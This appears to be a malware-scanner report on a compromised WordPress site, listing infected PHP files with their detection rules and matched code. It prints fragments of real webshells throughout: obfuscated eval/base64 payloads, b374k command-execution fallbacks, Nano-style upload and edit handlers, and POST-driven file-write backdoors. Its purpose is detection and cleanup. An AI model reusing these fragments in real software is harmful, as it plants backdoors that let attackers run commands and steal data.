| Exploit execution Line: 38 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
| Exploit hacked_by Dangerous Hacker credits | <?php Hacked By
| Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $c8[9]("{$Jd}/{$F1}")
| Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
| Sign 0f37c730 Line: 38 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268) | <?php eval(base64_decode(
| Sign 162cf671 Line: 38 Dangerous Malware Signature (hash: 162cf671) | <?php hcnJheV
| Sign 407651f7 Line: 38 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 7186bb8d Line: 38 Dangerous Malware Signature (hash: 7186bb8d) | <?php RfR0VU
| Sign 7830f7a6 Line: 38 Dangerous Malware Signature (hash: 7830f7a6) | <?php Nsb3Nl
| Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf) | <?php JlcGxhY2
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php eval
| Sign 91535293 Line: 38 Dangerous Malware Signature (hash: 91535293) | <?php lY2hv
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign 963e968a Line: 38 Dangerous Malware Signature (hash: 963e968a) | <?php PD9waH
| Sign a408f408 Line: 38 Dangerous Malware Signature (hash: a408f408) | <?php cmVwbGFjZ
| Sign ae7830db Line: 38 Dangerous Malware Signature (hash: ae7830db) | <?php Y2xvc2
| Sign bced5841 Line: 38 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d) | <?php Z1bmN0aW9u
| Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454) | <?php V4dHJhY3
| Sign e6546205 Line: 38 Dangerous Malware Signature (hash: e6546205) | <?php kX0dFV
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/woocommerce/loop/index.php Size: 25.31 kB Created: 2021-11-11 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["src"])
| Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["\x73\162\x63"])
| Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
|
|
/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/woocommerce/order/index.php Size: 25.30 kB Created: 2022-04-29 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3
| Description | Match |
|---|
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["src"])
| Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine | <?php fwrite($fp, $_POST["\163\162\x63"])
| Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code | <?php \x5f
|
|
/custdata02/turtle/public_html/wp-content/uploads/gravity_forms/c/e/g/c/firbpjquloy.php Size: 13.57 kB Created: 2024-06-01 02:57:03 Modified: 2024-06-01 08:12:23 Warns: 1
| Description | Match |
|---|
Function eval Line: 56 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_RnupfVPYevGNHl0Izs($GLOBALS[ôÑ][0x00008]))))))))))))))))))
|
|
/custdata02/turtle/public_html/wp-content/uploads/gravity_forms/c/e/g/c/myraekxgjbp.php Size: 43.93 kB Created: 2024-06-01 02:57:03 Modified: 2024-06-01 08:12:23 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'OykpKSkpKSkpKSkpKSkpKSkpKSkpKV04MDAwMHgwW12jxFtTTEFCT0xHJChVT3piTFZaVUs3Rm5kRE5STEhfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZX07KSkpKU1kYktEXyQoTXNmeF8oYlRGOTBmU18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2JURjkwZlNfJGxhYm9sZztrTFh5eDlzQl8kbGFib2xneylNZGJLRF8kKFVPemJMVlpVSzdGbmRETlJMSF8gbm9pdGNudWY7XTcwMDB4MFtdo8RbU0xBQk9MRyQ9YlRGOTBmU18kO102MDB4MFtdo8RbU0xBQk9MRyQ9a0xYeXg5c0JfJH07bmVTWGJYXyQgbnJ1dGVyOykpKV01MHg...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($PMEDV($rNbKo('OykpKSkpKSkpKSkpKSkpKSkpKSkpKV04MDAwMHgwW12jxFtTTEFCT0xHJChVT3piTFZaVUs3Rm5kRE5STEhfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZX07KSkpKU1kYktEXyQoTXNmeF8oYlRGOTBmU18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2JURjkwZlNfJGxhYm9sZztrTFh5eDlzQl8kbGFib2xneylNZGJLRF8kKFVPemJMVlpVSzdGbmRETlJMSF8gbm9pdGNudWY7XTcwMDB4MFtdo8RbU0xBQk9MRyQ9YlRGOTBmU18kO102MDB4MFtdo8RbU0xBQk9MRyQ9a0xYeXg5c0JfJH07bmVTWGJYXyQg...
| Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db) | <?php y2HY
| Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55) | <?php 'base64_decode'
|
|
/custdata02/turtle/public_html/wp-content/defaults.php Size: 14.78 kB Created: 2022-07-08 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27) | <?php $___ =
|
|
/custdata02/turtle/public_html/wp-content/product.php Size: 102.40 kB Created: 2022-05-13 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 10 Dangers: 13
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxl...
| Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system | <?php /etc/passwd
| Exploit etc_shadow Dangerous The `/etc/shadow` file on Unix systems contains password information, an attacker who has accessed the `etc/shadow` file may attempt a brute force attack of all passwords on the system | <?php /etc/shadow
| Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
| Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
| Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec] | <?php exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w"));
$s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array(...
| Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru] | <?php passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array("pipe", "w"));
$s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
if (is_resource($s_proc)) {
while($s_si = fgets($s_pipes[1])) {
if(!empty($s_si)) $s_out .= $s_si;
}
while($s_se = fgets($s_pipes[2])) {
i...
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner($s_l));
$s_group = posix_getgrgid(filegroup($s_l));
$s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
$s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
}
$s_lhref = $s_lname = $s_laction = "";
if(@is_dir($s_l)){
if($s_l=="."){
$s_lhref = $s_self."cd=".pl($s_cwd);
$s_lsize = "LINK";
$s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> | <a hr...
| Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill] | <?php posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p);
else{
if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p));
else $s_buff .= notif(exe("taskkill /F /PID ".$s_p));
}
}
}
if(!$s_win) $s_h = "ps aux"; // nix
else $s_h = "tasklist /V /FO csv"; // win
$s_wcount = 11;
$s_wexplode = " ";
if($s_win) $s_wexplode = "\",\"";
$s_res = exe($s_h);
if(trim($s_res)=='') $s_re...
| Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close] | <?php proc_close($s_proc);
if(!empty($s_out)) return $s_out;
}
if(is_callable('popen')){
$s_f = @popen($s_c, 'r');
if($s_f){
while(!feof($s_f)){
$s_out .= fread($s_f, 2096);
}
pclose($s_f);
}
if(!empty($s_out)) return $s_out;
}
return "";
}
// delete dir and all of its content (no warning !) xp
function rmdirs($s){
$s = (substr($s,-1)=='/')? $s:$s.'/';
if($dh = opendir($s)){
while(($f = readdir($dh))!==false){
if(($f!='.')&&($f!='..')){
$f = $...
| Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open] | <?php proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array());
if (is_resource($s_proc)) {
while($s_si = fgets($s_pipes[1])) {
if(!empty($s_si)) $s_out .= $s_si;
}
while($s_se = fgets($s_pipes[2])) {
if(!empty($s_se)) $s_out .= $s_se;
}
}
@proc_close($s_proc);
if(!empty($s_out)) return $s_out;
}
if(is_callable('popen')){
$s_f = @popen($s_c, 'r');
if($s_f){
while(!feof($s_f)){
$s_out .= fread($s_f, 2096);
}
pclose($s_f);
}
i...
| Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec] | <?php shell_exec($s_c);
if(!empty($s_out)) return $s_out;
}
if(is_callable('exec')) {
@exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('proc_open')) {
$s_descriptorspec = array(
0 => array("pipe", "r"),
1 => array("pipe", "w"),
2 => array...
| Function system Warning Potentially dangerous function `system` [https://www.php.net/system] | <?php system($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) return $s_out;
}
if(is_callable('shell_exec')){
$s_out = @shell_exec($s_c);
if(!empty($s_out)) return $s_out;
}
if(is_callable('exec')) {
@exec($s_c,$s_r);
if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s;
if(!empty($s_out)) return $s_out;
}
if(is_callable('passthru')) {
ob_start();
@passthru($s_c);
$s_out = ob_get_contents();
ob_end_clean();
if(!empty($s_out)) ret...
| Sign 11413268 Dangerous Malware Signature (hash: 11413268) | <?php eval("?>
| Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268) | <?php eval(str_rot13
| Sign 1f9aba5a Dangerous Malware Signature (hash: 1f9aba5a) | <?php if(is_callable('popen')
| Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6) | <?php nc -l
| Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc) | <?php <?php
eval
| Sign 963e968a Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Dangerous Malware Signature (hash: a408f408) | <?php code.google.com/p/b374k-shell
| Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2) | <?php uname -a
| Sign b236d073 Dangerous Malware Signature (hash: b236d073) | <?php /proc/cpuinfo
| Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e) | <?php b374k
|
|
/custdata02/turtle/public_html/wp-content/KygRqcdnXV7.php Size: 166.77 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Dangers: 2
| Description | Match |
|---|
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
| Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/wp-content/AD7cNSyusi8.php Size: 78.92 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 1
| Description | Match |
|---|
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408) | <?php cmd.exe
|
|
/custdata02/turtle/public_html/wp-includes/Requests/src/Exception/Http/index.php Size: 28.35 kB Created: 2022-01-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval($ver); return $view; } function backend($_claster) { $_module = $this->stable[0].$this->stable[4].$this->stable[3].$this->stable[1].$this->stable[2].$this->stable[5]; return $_module("\r\n", "", $_claster); } var $access; var $_debug = 0; var $ls = array('te', 'in', 'la', 'f', 'gz'); var $dx = array('on', 'crea', 'te_fun', 'cti'); var $lib = array('cod', 'de', 'base', '64_', 'e'); var $memory = array('ie', 'tco', 'se', 'ok'); var $stable = array('s', 'p', 'la', '_re', 'tr', 'ce'); var $core...
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/compat3x/index.php Size: 14.78 kB Created: 2022-05-30 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1
| Description | Match |
|---|
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27) | <?php $___ =
|
|
/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/hr/function.php Size: 21.74 kB Created: 2022-01-22 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 52
| Description | Match |
|---|
Exploit nano Line: 157 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[13]($_GET['dir'])
| Exploit nano Line: 159 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[12]()
| Exploit nano Line: 162 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[14]('\\', '/', $path)
| Exploit nano Line: 163 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[15]('/', $path)
| Exploit nano Line: 182 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[29]($path . '/' . $_POST['newFolderName'])
| Exploit nano Line: 183 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 185 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Create Folder Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 189 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[4]($_POST['newFileName'], $_POST['newFileContent'])
| Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Create File Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 192 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Create File Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 198 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path")
| Exploit nano Line: 200 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[30]($path. '/'. $_GET['item'], $_POST['newName'])
| Exploit nano Line: 201 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Rename Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 203 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Rename Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 207 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[4]($path. '/'. $_GET['item'], $_POST['newContent'])
| Exploit nano Line: 208 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Edit Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 210 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Edit Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 218 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 220 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Change Permission", "Failed", "error", "?dir=$path")
| Exploit nano Line: 225 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[27]($_GET['item'])
| Exploit nano Line: 226 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Delete Successfully!", "Success", "success", "?dir=$path")
| Exploit nano Line: 228 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Delete Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 231 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[28]($_GET['item'])
| Exploit nano Line: 241 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[17]($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i])
| Exploit nano Line: 245 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Upload File Successfully! ", "Success", "success", "?dir=$path")
| Exploit nano Line: 247 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Upload Failed", "Failed", "error", "?dir=$path")
| Exploit nano Line: 252 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[16]("Upload $i Files Successfully! ", "Success", "success", "?dir=$path")
| Exploit nano Line: 259 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[18]($path)
| Exploit nano Line: 277 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[0]()
| Exploit nano Line: 279 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[19]($_SERVER['SERVER_NAME'])
| Exploit nano Line: 331 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[20]($_POST['command'])
| Exploit nano Line: 349 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[9]($func[5]($path. '/'. $_GET['item'])
| Exploit nano Line: 366 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[11]($func[10]('%o', $func[6]($_GET['item'])
| Exploit nano Line: 400 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[25]('mysql_connect')
| Exploit nano Line: 430 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[22]($path)
| Exploit nano Line: 437 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[8]($dir)
| Exploit nano Line: 439 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[35]($dir)
| Exploit nano Line: 440 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[11]($func[10]('%o', $func[6]($dir)
| Exploit nano Line: 441 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[23]("Y-m-d h:i:s", $func[7]($dir)
| Exploit nano Line: 467 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[24]($dir)
| Exploit nano Line: 468 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[26]($dir)
| Exploit nano Line: 88 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[1]()
| Exploit nano Line: 89 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[2](0)
| Exploit nano Line: 90 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[31](0)
| Exploit nano Line: 91 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[32]()
| Exploit nano Line: 92 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[33]('error_log', null)
| Exploit nano Line: 93 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[33]('log_errors', 0)
| Exploit nano Line: 94 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[33]('max_execution_time', 0)
| Exploit nano Line: 95 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[33]('output_buffering', 0)
| Exploit nano Line: 96 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[33]('display_errors', 0)
| Exploit nano Line: 99 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano] | <?php $func[34]("disable_functions")
| Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid] | <?php posix_getpwuid(fileowner($item)); $downer = $downer['name']; } else { $downer = fileowner($item); } if (function_exists("posix_getgrgid")) { $dgrp = @posix_getgrgid(filegroup($item)); $dgrp = $dgrp['name']; } else { $dgrp = filegroup($item); } return $downer . '/' . $dgrp; } if (isset($_POST['newFolderName'])) { if ($func[29]($path . '/' . $_POST['newFolderName'])) { $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path"); } else { $func[16]("Create Folder Failed", "Failed",...
| Sign 5b557546 Line: 65 Dangerous Malware Signature (hash: 5b557546) | <?php 65786563
|
|
